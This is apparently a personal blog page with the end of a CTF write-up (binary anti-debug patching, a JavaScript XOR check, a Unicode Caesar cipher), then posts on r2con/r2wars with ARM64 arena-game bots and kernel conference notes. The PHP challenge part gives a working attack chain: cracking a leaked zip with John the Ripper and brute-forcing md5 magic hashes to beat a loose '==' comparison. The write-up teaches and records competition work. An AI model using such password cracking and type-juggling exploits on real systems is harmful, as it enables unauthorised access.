open() is called on a file whose name, once decoded, is /dev/urandom. But the filename is never decoded. Is this a bug? Or a last minute modification? Then, 10 bytes are read() from this file. The file is closed. And this is done again, 0x7a120 (500,000) times! This is another anti-debug, probably designed to slow down strace. I tried running the binary (in a disposable VM!); strace is indeed very slow. Running the binary directly takes less than 5 seconds to pass this code. I'm guessing that it was probably decided that actually opening and reading the blocks in /dev/urandom would be too slow, or less portable. Or it's just a bug :smile:

Since I had already disabled an anti-debug, I disable this one as well:

[0x004007c2]> s 0x004007cb
[0x004007cb]> "wa  mov dword [rsp+0x2c], 0"

By setting the loop counter to 0 instead of 0x7a120, this anti-debug code is never run.

After this, there's another unaligned jump trick, and then the value that was read() previously is finally analyzed:

[0x0040082e]> pd 20 @ 0x40082e
│           ; CODE XREF from sub.BB_7c2 (0x40082b)
│           0x0040082e      488b442408     mov rax, qword [local_8h]   ; [0x8:8]=-1 ; 8
            0x00400833      0fb600         movzx eax, byte [rax]
            0x00400836      3c73           cmp al, 0x73                ; 's' ; 115
        ┌─< 0x00400838      0f8581010000   jne 0x4009bf                ; sub.BB_7c2+0x1fd
        │   0x0040083e      488b442408     mov rax, qword [rsp + 8]    ; [0x8:8]=-1 ; 8
        │   0x00400843      4883c001       add rax, 1
        │   0x00400847      0fb600         movzx eax, byte [rax]
        │   0x0040084a      3c69           cmp al, 0x69                ; 'i' ; 105
       ┌──< 0x0040084c      0f856d010000   jne 0x4009bf                ; sub.BB_7c2+0x1fd
       ││   0x00400852      488b442408     mov rax, qword [rsp + 8]    ; [0x8:8]=-1 ; 8
       ││   0x00400857      4883c002       add rax, 2
       ││   0x0040085b      0fb600         movzx eax, byte [rax]
       ││   0x0040085e      3c67           cmp al, 0x67                ; 'g' ; 103
      ┌───< 0x00400860      0f8559010000   jne 0x4009bf                ; sub.BB_7c2+0x1fd

It looks like a character-by-character comparison of the buffer read, starting with 's', then 'i', then 'g'. Is this the flag ? We know (it's in the rules) that the flags are in the format sigsegv{FLAG}, so this looks like it ! Two "unaligned jumps" later, we can gather all the characters for the flag. This is left as an exercise for the reader.
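Collecting the compared characters by hand is tedious, so here is a hedged sketch of how it could be scripted from a text dump of the disassembly. It only uses the three cmp instructions visible above, and it assumes that the comparisons appear in the same order as the buffer offsets, which holds for these three but which I did not verify for the whole function.

```python
import re

# Three instructions copied from the listing above; the real function has more.
DISASSEMBLY = """
0x00400836      3c73           cmp al, 0x73                ; 's' ; 115
0x0040084a      3c69           cmp al, 0x69                ; 'i' ; 105
0x0040085e      3c67           cmp al, 0x67                ; 'g' ; 103
"""

def compared_chars(listing: str) -> str:
    """Collect the immediate of every `cmp al, imm8`, in listing order."""
    immediates = re.findall(r"cmp al, 0x([0-9a-f]{1,2})\b", listing)
    return "".join(chr(int(value, 16)) for value in immediates)

print(compared_chars(DISASSEMBLY))
```

Fed with the complete function (including the parts hidden behind the unaligned jumps), the same loop should spell out the whole expected input.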

This was quite a tedious debug. In fact, I could have ignored most of this, and jumped directly to the interesting part: the analysis of the read() result. Instead, I spent a lot of time disabling anti-debugs, analyzing the decryption function, and I even played a bit with ESIL emulation (not shown here). It was fun, but it could have been solved much more quickly. The top challenger did it in ~4 minutes, while it took me a few hours, but I learned a lot along the way!

Javascript obfusqué

This challenge starts quite simply. You can find the backed-up source here. Just opening the developer console in the browser allows you to quickly see the whole unpacked code (formatted a bit here):

function Kod(s, pass) {
    var i=0;
    var BlaBla="";
    for(j=0; j<s.length; j++) {
        BlaBla+=String.fromCharCode((pass.charCodeAt(i++))^(s.charCodeAt(j)));
        if (i>=pass.length) i=0; 
    }
    return(BlaBla);
}
function f(form){
    var pass=document.form.pass.value;
    var hash=0;
    for(j=0; j<pass.length; j++){
        var n= pass.charCodeAt(j);
        hash += ((n-j+33)^31025); 
    }
    if (hash == 529387) {
        var Secret =""+"\x4f\x01\x13\x1e\x09\x59\x34\x09\x0b\x05\x26\x53\x31\x41\x5a\x18\x0e\x53\x1d\x15\x1c\x10\x11\x13\x5b\x06\x16\x69\x15\x29\x55\x1d\x55\x5d\x06\x1d\x0e\x1f\x0c\x14\x13\x5b\x06\x16\x69\x1e\x2a\x40\x5a\x1d\x18\x53\x19\x06\x00\x16\x02\x56\x0a\x1f\x16\x69\x07\x30\x14\x1b\x0a\x5d\x07\x1b\x08\x06\x13\x02\x56\x0b\x05\x06\x3b\x53\x33\x55\x16\x10\x19\x16\x1b\x47\x1f\x00\x47\x15\x13\x0b\x1f\x25\x16\x2b\x53\x1f\x45\x52\x1b\x1d\x0a\x1f\x5b"+"";
        var s=Kod(Secret, pass);
        document.write (s); 
    } else {
        alert ('Wrong password!'); 
    } 
}

The function f() is called on form submit. It first computes a custom checksum of the password, and if it matches, it tries to use it to decrypt a secret with Kod(). This custom checksum contains a core XOR, that is run on every character, before adding to the total sum. We know that there's a good chance that each character's charCode will be < 127 (in the ASCII space), so we can actually use the checksum to deduce the size of the password (the upper bits being more significant):

529387/31025 = 17.06323932312651

It's 17 characters !
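The division above is only an estimate; a slightly more careful sketch shows that 17 is the only length that fits. It assumes that n - j + 33 always stays between 0 and 255 (true for printable ASCII and reasonably short passwords), so the XOR with 31025 (0x7931) can only change the low byte of each term. The function names are mine; checksum() is a direct port of the loop in f().

```python
TARGET = 529387
XOR_KEY = 31025  # 0x7931

def checksum(password: str) -> int:
    """Python port of the checksum loop in f()."""
    return sum((ord(ch) - j + 33) ^ XOR_KEY for j, ch in enumerate(password))

def possible_lengths(target: int, max_len: int = 64) -> list:
    """Lengths for which `target` fits between the smallest and largest possible sums."""
    low = XOR_KEY & ~0xFF   # 30976: smallest possible term
    high = low | 0xFF       # 31231: largest possible term
    return [n for n in range(1, max_len + 1) if n * low <= target <= n * high]

print(possible_lengths(TARGET))
```

With 16 characters the sum cannot exceed 499696, and with 18 it is at least 557568, so only 17 remains.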

The decode function is Kod(); it is a repeating-key XOR with the password as key, and the Secret variable as message. This should be crypto 101 (well, almost), and if not, you can follow the cryptopals challenges to learn how to do that. Since I wasn't so certain that I could do it on my own in a short-enough time, I just reused someone else's solution with the key size I already found. It didn't give a perfect decrypt, but it was close enough to help me find the flag.

In retrospect, I could have also used the fact that the start of the flags is always the same ('sigsegv{'), and then decode it by hand, but this was good enough.
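Here is a minimal sketch of that known-prefix idea, limited to the first eight bytes of Secret. The helper xor_bytes is my own port of Kod() to Python bytes; the key prefix comes from the flag format given in the rules.

```python
# First eight bytes of the Secret string from f().
SECRET_PREFIX = bytes([0x4F, 0x01, 0x13, 0x1E, 0x09, 0x59, 0x34, 0x09])
KNOWN_KEY_PREFIX = b"sigsegv{"  # flag format announced in the rules

def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR, the same operation as Kod()."""
    return bytes(d ^ key[i % len(key)] for i, d in enumerate(data))

print(xor_bytes(SECRET_PREFIX, KNOWN_KEY_PREFIX))
```

The result looks like the start of an HTML page, which confirms the key prefix. From there, guessing the next plaintext characters and XORing them with the corresponding Secret bytes would give the next key characters, and so on.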

In the JS console of your browser, you can see how to decrypt the secret:

Kod(Secret, flag)
"<html>Bravo tu as trouve le flag, utilise le mot de passe que tu as trouve pour valider le challenge</html>"

Un nouveau dialecte

This challenge was in the "Crypto" section. Wait, didn't we have crypto in the last two challenges as well?

The goal was to decode this new "dialect":

ȃǹǷȃǵǷȆȋǜǑǣǤǕǗǑǓǕǣǤǠǑǣǣǙǖǑǓǙǜǕȍ

As I do in most challenges, I put the content in a file (named "file", I also lack imagination), loaded it in ipython3, and started visualizing and massaging the data:

Python 3.6.6 (default, Jul 19 2018, 14:25:17) 
Type 'copyright', 'credits' or 'license' for more information
IPython 6.4.0 -- An enhanced Interactive Python. Type '?' for help.

In [1]: a=open("file", "rb").read()
In [2]: print(a)
b'\xc8\x83\xc7\xb9\xc7\xb7\xc8\x83\xc7\xb5\xc7\xb7\xc8\x86\xc8\x8b\xc7\x9c\xc7\x91\xc7\xa3\xc7\xa4\xc7\x95\xc7\x97\xc7\x91\xc7\x93\xc7\x95\xc7\xa3\xc7\xa4\xc7\xa0\xc7\x91\xc7\xa3\xc7\xa3\xc7\x99\xc7\x96\xc7\x91\xc7\x93\xc7\x99\xc7\x9c\xc7\x95\xc8\x8d'

In [3]: print(str(a, encoding="utf-8"))
ȃǹǷȃǵǷȆȋǜǑǣǤǕǗǑǓǕǣǤǠǑǣǣǙǖǑǓǙǜǕȍ
In [4]: b = [ a[i:i+2] for i in range(0, len(a), 2) ]
In [5]: b
Out[5]:
[b'\xc8\x83',
 b'\xc7\xb9',
 b'\xc7\xb7',
 b'\xc8\x83',
 b'\xc7\xb5',
 b'\xc7\xb7',
 b'\xc8\x86',
 b'\xc8\x8b',
 b'\xc7\x9c',
 b'\xc7\x91',
 b'\xc7\xa3',
 b'\xc7\xa4',
 b'\xc7\x95',
 b'\xc7\x97',
 b'\xc7\x91',
 b'\xc7\x93',
 b'\xc7\x95',
 b'\xc7\xa3',
 b'\xc7\xa4',
 b'\xc7\xa0',
 b'\xc7\x91',
 b'\xc7\xa3',
 b'\xc7\xa3',
 b'\xc7\x99',
 b'\xc7\x96',
 b'\xc7\x91',
 b'\xc7\x93',
 b'\xc7\x99',
 b'\xc7\x9c',
 b'\xc7\x95',
 b'\xc8\x8d']

I first analyzed the UTF-8 encoded codepoints (as binary data), but was soon lucky, and found that the Unicode codepoints (not their UTF-8 encoded version) were in fact all in the same range, hinting at a simple Caesar cipher. Here is the final visualizing and decoding program:

#!/usr/bin/env python3
# coding: utf-8

s=open("file", "r").read()

for i in s:
    print("{} {:04x}: {:16b}".format(i, ord(i), ord(i)), end='\t')
    x = ord(i) - 0x100 - 144
    print("{:09b} {} {}".format(x, x, chr(x)))

print("".join([chr(ord(i) - 400) for i in s]))

Note that this was very easy because I'm used to launching python3 by default, which is unicode-native; ord() behaves as it should. Anyone used to python2 would be in a bit more pain, since the characters would have been interpreted byte-by-byte.
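The offset of 400 does not have to be guessed: assuming the plaintext starts with the usual sigsegv{ prefix, it falls out of a subtraction. A short sketch, using only the first eight characters of the ciphertext (written as escapes to avoid any encoding trouble); the variable names are mine.

```python
# First eight characters of the ciphertext.
CIPHER_PREFIX = "\u0203\u01f9\u01f7\u0203\u01f5\u01f7\u0206\u020b"
KNOWN_PREFIX = "sigsegv{"  # flag format announced in the rules

# A Caesar-like shift gives the same difference for every position.
shifts = {ord(c) - ord(p) for c, p in zip(CIPHER_PREFIX, KNOWN_PREFIX)}
print(shifts)

shift = next(iter(shifts))
decoded = "".join(chr(ord(c) - shift) for c in CIPHER_PREFIX)
print(decoded)
```

A single value in the set means the same shift applies to every character, which is what makes this a plain Caesar cipher on codepoints.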

La simplicité

Under the "simplicity" title, this one might be the longest to solve. To start, you're given a "simple" website, that looks like this:

$ curl  http://51.158.73.218:8880/
<html>
    <head>
        <title>Un site simple</title></title>
    </head>
    <body>
        <center><iframe width="560" height="315" src="https://www.youtube.com/embed/2bjk26RwjyU?rel=0&amp;controls=0&amp;showinfo=0" frameborder="0" allow="autoplay; encrypted-media" allowfullscreen></iframe></center>
<!-- Si une méthode ne fonctionne pas il faut en utiliser une autre -->
<!-- Un formulaire c'était pas assez simple donc on en a pas mis -->
</body>
</html>

I did quite a lot of exploration on this: I tried different http methods (to no avail), I discovered that the name of the file was "index.php". I tried a few standard "admin" pages. Then I moved on to the other challenges, keeping this one last.

When I came back to it, I had an epiphany. The solution to unlock the first step was simple, in retrospect (as announced):

$ curl  http://51.158.73.218:8880/robots.txt
backup.zip

Oh. So I download this zip file (backup here), and it's a password-protected zip containing an index.php:

$ unzip backup.zip
Archive:  backup.zip
[backup.zip] index.php password:

No solution here, one has to use bruteforce to crack this zip. I download john the ripper, and extract the crackable hash:

$ ./JohnTheRipper/run/zip2john  backup.zip  > john.hash
ver 2.0 efh 5455 efh 7875 backup.zip->index.php PKZIP Encr: 2b chk, TS_chk, cmplen=453, decmplen=680, crc=70C7CB88
$ cat john.hash
backup.zip:$pkzip2$1*2*2*0*1c5*2a8*70c7cb88*0*43*8*1c5*70c7*bce4*01f43e1d0eb0118661d22e480e38736de7c321d3ac1cf086601594c4ab54ebc7af0ad5ea01c8b64bda21aee19533a09808c0e7892fdb08f8df9644eeefc9aabe92b3c1cb10fb981090365d55229da292afba120f388d25a56e52c91b42af567d2ee897c5bd979b673a99fe187e4064f438165815d29fad2d1a7edbdf46ee2ff99afb546e1626cbb57897b6a108a3fb108495ec508243bffe3d050efe1b9aadf700695f8aca72e4e1977f827702ec5840fbe1559e0ac1e646323ea051ee69257030c3b33d305d9ab6f70dc600a2d4cc07482df8d95e4dd8741082540e3b2ec988eab2c99a595927eb31cc589d8bd28068ddd375588c668f52f5896d45e42de0d1933dc390a5c2a5ee3b8d30b91b763bb77892651dd9241bf03dde65ad8b6acee2bcb3942dc800aa3350d2f894c32fc0dcba5164d9db59dd09044d28b44181a19398d27c64b65bd1c8e4cdce21eeac513172d340ca4b54baf5570921dc182e3b02b0ff8d0b0ac4070a0715f6300f8fb99ffdc665270cc98fae8d28f3727742b79e2bd9392f35e4564a243234e9cf502beb0e3572c2c83a33b68c56cc317aece233f99a02838c9c562ebb3271d58aa6bb653b43803c9188b1c737cfa827c533ff301e453fb111*$/pkzip2$:::::backup.zip

Then I run john on it:

$ ./JohnTheRipper/run/john --show john.hash 
backup.zip:passw0rd:::::backup.zip

1 password hash cracked, 0 left

This runs almost instantly; so the password is "passw0rd". We can unzip the file, and get the source code of index.php. This is the same page as before, with the more interesting parts shown here:

<?php
include "auth.php";
?>
[…]
<?php
        if(isset($_POST["h1"]))
        {
                $h1 = md5($_POST["h1"] . "Shrewk");
                echo "h1 vaut: ".$h1."</br>";
                if($h1 == "0")
                {
                                echo "<!--Bien joué le flag est ".$flag."-->";
                }
        }
?>
[…]

So, there's a POST parameter h1, which is hashed with a "Shrewk" salt, and then compared to the string "0". Wait, what ? How can md5() return "0" ?

The php documentation doesn't mention anything of the sort. But you can quickly find that the comparison operator "==" isn't recommended to compare strings, because of type juggling. Indeed, a string like "1e3" will be interpreted as the number 1000, for example. A secure string comparison should use "===".

So, this might be the core of the challenge. Maybe what we need is an md5 hash string that starts with one or more "0", then "e" or "E", and then is followed by only digits? Such a string reads as zero times a power of ten, which is 0, so it would compare equal to "0". It looks like we need to crack some md5 as well.
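To make the target concrete, here is a sketch of what such a "magic" digest looks like. Python's float() is only used as an analogy for how a numeric string is read; it is not PHP's comparison algorithm. The names MAGIC, looks_like_zero and salted_md5 are mine, and the regex asks for at least one digit after the exponent marker, which is my own (slightly stricter) choice.

```python
import hashlib
import re

MAGIC = re.compile(r"0+[eE][0-9]+")
SALT = b"Shrewk"  # appended to the input by index.php

def looks_like_zero(hex_digest: str) -> bool:
    """True when the digest is zeros, then e/E, then only digits."""
    return MAGIC.fullmatch(hex_digest) is not None

def salted_md5(candidate: bytes) -> str:
    """Hex md5 of the candidate followed by the salt, like md5($_POST["h1"] . "Shrewk")."""
    return hashlib.md5(candidate + SALT).hexdigest()

# Read as numbers, "1e3" is 1000 and "0e123" is 0 (analogy only).
print(float("1e3"), float("0e123") == float("0"))
print(salted_md5(b"test"), looks_like_zero(salted_md5(b"test")))
```

A random candidate such as "test" is very unlikely to match; the point of the search is to try enough inputs until one digest has this shape.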

I installed hashcat, and started looking at the documentation. I found a lot of ways to parametrize the input to be hashed, but no way to filter the hashes in output to look like a given format. I attempted to generate a lot of hashes in hope of finding a random password that would match one of them, with the given program:

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>



int main() {
        uint64_t i;
        unsigned int seed = 1; /* arbitrary start value: rand_r() reads the seed, so it must be initialized */
        for (i = 0; i < (1<< 29); i++)
                printf("0e%010d%010d%010d:Shrewk\n", rand_r(&seed), rand_r(&seed), rand_r(&seed));
}

This writes data in the hashcat format hash:salt. I used it to generate a lot of potential hashes, but hashcat needs to load all of them into memory, and whether you have 1GB or 1TB of RAM, this is still many orders of magnitude smaller than the space I want to explore. So while hashcat was running, I started working on a more exhaustive exploration.

I decided to use a go program, because this is an embarrassingly parallel problem, and will be much easier to crack with goroutines. First, here is the match function, to test if a hex-encoded hash has the format we want:

func match(x string) bool {
        i := 0
        for i < len(x) && x[i] == '0' {
                i++
        }
        // need at least one leading zero, and something left after the zeros
        if i < 1 || i == len(x) {
                return false
        }
        if x[i] != 'e' && x[i] != 'E' {
                return false
        }
        for i++; i < len(x) && (x[i] >= '0' && x[i] <= '9'); i++ {
        }
        return i == len(x)
}

And its corresponding test:

func TestMatch(t *testing.T) {
        samples := []struct {
                v   string
                ret bool
        }{
                {"000e1234123456781234567812345678", true},
                {"0a0e1234123456781234567812345678", false},
                {"00E01234123456781234567812345678", true},
                {"00EE1234123456781234567812345678", false},
                {"00E01234123456781234567812345ab8", false},
                {"0e000000000000000000000000000000", true},
        }
        for i := range samples {
                if match(samples[i].v) != samples[i].ret {
                        t.Fatal("Error: ", samples[i].v, samples[i].ret)
                }
        }
}

This is the only function that was tested because of how core it was to finding a solution. Note that it might have been faster to work directly on byte data instead of converting the md5 to a hex-encoded string, but I found it an acceptable compromise to keep the code readable and correct.

The rest of the code is just an exhaustive exploration of password space (with the salt), with a recursive core.

func core2(share, max int) {
        const alphabet = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwyxz.;/-{}"
        const salt = "Shrewk"
        for size := share; ; size += max {
                if size == 0 {
                        continue
                }
                b := make([]byte, size+len(salt))

                for c := 0; c < size; c++ {
                        b[c] = alphabet[0]
                }
                for c := 0; c < len(salt); c++ {
                        b[c+len(b)-len(salt)] = salt[c]
                }
                var charloop func(int, func())
                charloop = func(i int, f func()) {
                        for c := 0; c < len(alphabet); c++ {
                                b[i] = alphabet[c]
                                if i > 0 {
                                        charloop(i-1, f)
                                } else {
                                        f()
                                }
                        }
                }
                //recursion is much easier
                charloop(size-1, func() {
                        h := md5.Sum(b)
                        he := hex.EncodeToString(h[:])
                        if match(he) {
                                fmt.Println("Found match: ", string(b), he)
                                os.Exit(0)
                                return
                        }
                })
        }
}

Particular attention was given to minimizing allocations, to reduce their performance impact. This is why the core function works on a single []byte slice. hex.EncodeToString still allocates on every call, though.
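One way to avoid that last allocation would be hex.Encode, which writes into a caller-provided buffer. The sketch below is an untested idea rather than what I ran; hexSum is a hypothetical helper, and match would need a []byte variant to use it.

```go
package main

import (
	"crypto/md5"
	"encoding/hex"
	"fmt"
)

// hexSum writes the hex-encoded MD5 of data into dst and returns the
// written part. dst must be at least hex.EncodedLen(md5.Size) bytes long.
func hexSum(dst, data []byte) []byte {
	h := md5.Sum(data)
	n := hex.Encode(dst, h[:])
	return dst[:n]
}

func main() {
	// allocated once, then reused for every candidate
	buf := make([]byte, hex.EncodedLen(md5.Size))
	for _, candidate := range []string{"", "KgeM5000Shrewk"} {
		fmt.Printf("%q -> %s\n", candidate, hexSum(buf, []byte(candidate)))
	}
}
```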

The main function does the work sharing, in a naive way: the size of the password is used to slice the work between goroutines:

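func main() {
        c := make(chan struct{})
        for i := 0; i < runtime.NumCPU(); i++ {
                // pass i as an argument: before Go 1.22, a closure would share
                // a single loop variable between all the goroutines
                go func(share int) {
                        core2(share, runtime.NumCPU())
                        c <- struct{}{}
                        os.Exit(0)
                }(i)
        }
        <-c
}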

This means that the program is non-deterministic: which password it finds first depends on the number of cores we have and on the particular scheduling of goroutines.

This code finds a password on my 2012 laptop in about 3 minutes.

$ time ./crack 
Found match:  KgeM5000Shrewk 0e957579856924481004771378652894

real    2m45.885s
user    10m28.607s
sys     0m2.147s

And let's test this password we found:

$ curl -s -d h1=KgeM5000  http://51.158.73.218:8880/index.php |grep flag
h1 vaut: 0e957579856924481004771378652894</br><!--Bien joué le flag est sigsegv{a1a29afa647a20758e64b49d8eb453f4}--><!-- Si une méthode ne fonctionne pas il faut en utiliser une autre -->

Unsurprisingly, it was much faster on a modern 8-core Xeon, and it found another password first because of the work sharing structure:

$ curl -s -d h1=QM8.B0  http://51.158.73.218:8880/index.php |grep flag
h1 vaut: 0e893977776066512259427456189998</br><!--Bien joué le flag est sigsegv{a1a29afa647a20758e64b49d8eb453f4}--><!-- Si une méthode ne fonctionne pas il faut en utiliser une autre -->

And that's it for the challenges!

Kernel Recipes 2018 liveblog

2018-09-26T00:00:00+02:00

I had a lot of good feedback on the previous years' live-blogs of the Embedded and Kernel Recipes conferences. So much in fact, that this year I'm doing the liveblog directly on the official website of Kernel Recipes.

I hope you enjoy it!

I also live-tweeted my impressions of Embedded Recipes day 1 and day 2.

r2con 2018 and r2wars

2018-09-08T00:00:00+02:00

I tried something new this year, by going to r2con, a conference dedicated to radare2, a reverse engineering toolkit.

r2con

This conference is one of the most affordable security conferences out there. I've used radare2 (r2) in the past, but I don't think I fully understood its philosophy until going there. The radare2 community is really focused on creating the best toolkit for analyzing, disassembling, debugging and reverse engineering software, all while keeping it fully free software.

The training was very interesting, with demos and hands-on experience.

The organization was great, and it was a sleek conference. Many thanks to the organizers.

I've had to install Telegram for the first time to participate in the local discussions, and apparently I wasn't the only one new to Telegram. I've mostly interacted with the radare2 community through IRC before (they have a bridge).

I've met many great people from all over the world; I was honestly surprised by how welcoming the community is.

The conference had a single track of talks (all recorded), a CTF (capture-the-flag) game focused on reverse engineering binaries: to crack them, exploit them, etc. with radare2, as well as a little game called "r2wars", on which I spent way more time than I care to admit.

r2wars

In radare2, there's an intermediate language and VM called ESIL. It is used to emulate code, and supports many architectures. r2wars is built on top of r2's ESIL VM, but the rules limit to the following architectures: x86-32, arm-32, arm-64 and mips-32.

In r2wars, two opponents create "bots", short shellcodes, which are executed one after the other, in the same memory space, thanks to ESIL emulation. The goal is to be the last to survive; you must wipe or crash your opponent, or simply wait for your opponent to die on its own by writing or executing at invalid memory.

You upload the source code of your bot to the r2wars server through a web interface; the server software uses rasm2, the radare2 assembler, to build your bot, then it launches radare2, initializes ESIL, and runs 1v1 matches in a tournament to determine the winner.

My bots

I've dumped the source code for all my bots on github (spoilers!).

Naive approach

My very first idea was to create a self-replicating bot that would survive forever by copying itself in a loop. It took me a long time to build as I was getting used to the aarch64 assembly (I mostly have experience with aarch32 and thumb).

One of the first hurdles was that the rasm2 assembler is still quite incomplete. It does not support all arm64 addressing modes for the branch instructions, it does not support load/store pre/post-indexing, and it handles labels in a naive way. For example, if you give a very short name to your label (say, 'x'), it will replace all occurrences of "x" in the program; which might be an issue in arm64, since the registers are named x0 to x30.

One of the goals of the r2wars competition was to improve rasm2 and ESIL emulation in radare2. I looked at instruction encoding, finding a few references in addition to the official manual, but I couldn't figure out the post-index address encoding for ldp in a short-enough time to be useful for the competition, so I moved to the GNU assembler included in the Fedora package binutils-aarch64-linux-gnu. The binary code is then converted to .hex directives for rasm2.

Once I did that, I discovered that ESIL emulation in radare2 was much more complete, and that the code I wrote behaved as expected (well, minus my bugs).

At first I attempted to make use of "combined" instructions like csel, cbz, or ldp/stp; I've mostly kept ldp/stp afterwards, since they are the instructions which can read and write the most data at once: two 8-byte registers, with the option to modify the addressing register at the same time with the so-called pre-index (modify the register before the load/store) and post-index (modify it after the load/store) addressing modes. Repeated, this allowed doing the most damage. This is my first bot:

 adr x0, -16
 add x1, x0, endprog
 add x5, x1, endprog
 cmp x5, 1024 - 16
 csel x1, xzr, x1, gt
 add x5, x1, endprog
 add x4, x1, 16
looprog:
 ldp x2, x3, [x0, 16]!
 stp x2, x3, [x1, 16]!
 cmp x1, x5
 b.lt looprog
 br x4
endprog:
 nop

It's very naive, but it works. It copies itself in a loop, and wraps at 1024 bytes. It should never die when left alone. The issues are numerous, but the biggest ones are that it's simply too slow, and too big, clocking in at 48 bytes of useful instructions. I submitted it once, but never used it in a competition, replacing it with a better one.

Simplicity

Once I managed to build and run the official r2wars server (you need an official version of Mono for that, not the distro versions which are too old), I started writing other bots to have them compete with each other, before the official matches. I wrote a few variants of this bot:

adr x0, 68
adr x1, -4
loop:
  stp x0, x2, [x1, -16]!
  stp x1, x2, [x0, 16]!
  b loop

This bot will first get its own address + 68 (to be at the end of the space reserved by r2wars), and then will start writing groups of bytes in the up and down directions, until it dies by reaching invalid memory.

And most of those simple bots weren't statistically worse than the original bot. As it was already 3am before the competition started, I decided to call it a night, and submit my initial naive approach.

Insomnia

But. I just couldn't sleep. I had so many ideas, so I got up and wrote this one quickly:

adr x0, start
mov x3, 1008
ldp x1, x2, [x0]
stp x1, x2, [x3]
br x3
start:
stp x0, x4, [x3, -16]!
stp x0, x4, [x3, -16]!
stp x0, x4, [x3, -16]!
b start

This one copies its payload at the end of the arena in only 4 instructions, jumps to it, and then the payload will just overwrite all bytes at a significantly higher rate than the other ones. I wasn't sure it would be more efficient, but I went to sleep for real.

The following morning, I ran the simulations again, and this new one was completely thrashing the others. I decided to submit it, and it was the one used in the first tournament.

The fights

It didn't fare so well during the first iteration of the tournament. It was the only arm-64 bot, mostly against x86 bots, and I didn't understand why, but it finished 5th out of 8. Not too bad.

I went on to work on my next idea: a single-instruction bot, providing a much slimmer target against non-linear writes, and always writing its next instruction. It needed to be slow, to not die quickly, so I had to write only 4 bytes at once. So I changed from the wide-store stp, to the smaller str. It supported the pre-indexing addressing mode, so it could work.

But that's when I found my first ESIL bug. It turned out that ESIL arm64 emulation only implemented the pre-indexing addressing for str. I looked more into the code, and found that the ESIL VM used reverse Polish notation instructions. It looked complicated, but I tried to understand how stp pre-indexing was implemented. I got derailed, so I missed the next r2wars tournament iteration, and didn't upload any update!

But, magically, this time, my bot had it much better. Either the other opponents evolved to algorithms that were weaker against this strategy, or the new opponents gave me more points, or simply the randomness of the initial position was more favorable; but anyway, I arrived in 3rd position this time. I got a prize for being in the top 3, and was very happy. But this was only the beginning.

Stack escape

I noticed that some opponents would continue on living after I had overwritten them. How? They were running x86-32 code. And it turns out, I was mostly writing zeroes, which are interpreted as valid x86 instructions. This architecture simply has too many valid opcodes.

I also noticed that one of the x86-32 opponents, zutle, had a sudden weird bug: it was executing code at 0x01780xxx address. What sorcery was this? Isn't the arena between 0 and 1024? It turns out that in ESIL, that is the default initialized stack address. And it's executable! Time for a new bot.

The idea of this bot, was to copy its 4-instructions payload somewhere on the stack, live there, and wipe the whole arena from there, in a loop:

adr x0, start
mov x3, 0x7ff0
movk x3, 0x0018, lsl 16
ldp x1, x2, [x0]
stp x1, x2, [x3]
mov x5, 0
neg x0, x0
mov x1, x0
br x3
start:
stp x0, x1, [x5], 16
stp x0, x1, [x5], 16
and x5, x5, 0x3ff
b start

And this time, it would only write 0xff bytes (well, mostly), to prevent the x86 valid 0x00 opcodes. The strategy is otherwise the same. It starts at 0, and overwrites the whole arena with a post-indexed stp, and the and here checks when the end is reached (a much better idea than my initial csel-based naive approach). And it worked well, in my simulations (with r2 and r2wars from git).

But not in the tournament. In the tournament, it turns out that the post-index in the stps was simply ignored. So the bot escaped to the stack, and then basically waited at the beginning of the address space for the opponent to come and be overwritten. Sometimes it would work, sometimes the opponent would kill itself, and sometimes, it would run forever. Well, not forever, since the game has a timeout of 4000 cycles (already reduced from 8000 cycles in the first round). After the timeout, a draw would happen.

The timeout shouldn't be an issue, since the timeout usually happens in less than 30 seconds... for an x86 bot. It turns out, ESIL arm64 emulation was much slower than x86, and the timeout felt like it was 10 times longer (I didn't measure). My bot was still the only arm-64 fighter at this stage (there was one arm-32, and one mips, the rest was x86-32), so I was responsible (well, with the ESIL bug in the r2 version of the organizer) for a VERY long tournament. It took ~1h15m instead of the usual ~7m.

Of course, I wasn't the only one to have this idea. Konrad had the same idea as he entered the game, and wrote an x86-32 bot with this strategy; our bots didn't meet, so we had a draw. His bot didn't have a buggy emulation, so he had fewer draws and finished first. I was second, so I got another prize! Yeah!

Special mention to Dimitris, who managed to be third here with a strategy that didn't use any stack escape. And he had more wins than my bot! (I ranked higher because I had more draws.)

Of course, this very long tournament iteration triggered a reaction from the organizers, and execution out of the main arena had to be forbidden. No more stack execution.

Ending

So, with my last strategy not working anymore, I re-uploaded my first competing bot, and called it a day. I had already won top-3 twice, and I didn't need any more prizes. I tried other strategies for a while, but didn't submit them and came back to fixing ESIL emulation of str pre-index and post-index addressing. I sent a pull request to radare once it somehow worked, and went on to follow more conferences.

The next round saw my strategy doing relatively badly, finishing 7th out of 12. Fighting bots of different architectures is sometimes a disadvantage: x86 has more compact instructions, it has an instruction to dump all registers permitting very wide writes, etc.

I still took the opportunity to update it before the last round to write 0xff instead of 0x00 to improve the win-rate against x86 bots:

adr x0, start
mov x3, 1008
neg x5, x0
mov x4, x5
ldp x1, x2, [x0]
stp x1, x2, [x3]
br x3
start:
stp x5, x4, [x3, -16]!
stp x5, x4, [x3, -16]!
stp x5, x4, [x3, -16]!
b start

I really want to thank the organizer of this tournament, skuater. He couldn't be present at r2con since he missed his flight, but still streamed the tournament, reacted to bugs we found, provided very nice support over Telegram, told us when our bots weren't building, etc. Kudos!

I didn't get to watch the last tournament of r2wars because I had to leave early. As I finish writing these lines, my plane lands in Paris. I open my phone, to see that my PR was merged. And that Konrad just sent me this picture, showing the results of the last r2wars tournament:

Kernel Recipes 2017 day 3 notes

2017-09-29T00:00:00+02:00

This is a continuation of day 1 and day 2 of Kernel Recipes 2017.

Using Linux `perf` at Netflix

by Brendan Gregg

Brendan started with a ZFS on Linux case study, where it was eating 30% of the CPU resources, which it should never be doing. He started by generating a flame graph with perf, through Netflix's Vector dashboard tool. It was confirmed instantly, despite the initial hunch. This was then quickly thought to be the container teardown cleanup using lots of resources. The only issue here, is that this particular project never used ZFS. It was in fact the free code path trying to get real entropy to free empty lists. It was later fixed in ZFS.

A particular point underlined is that when profiling, you want to see everything, from the kernel, to userspace C or Java code. perf allows doing that, because it has no blind spots, is accurate and low overhead.

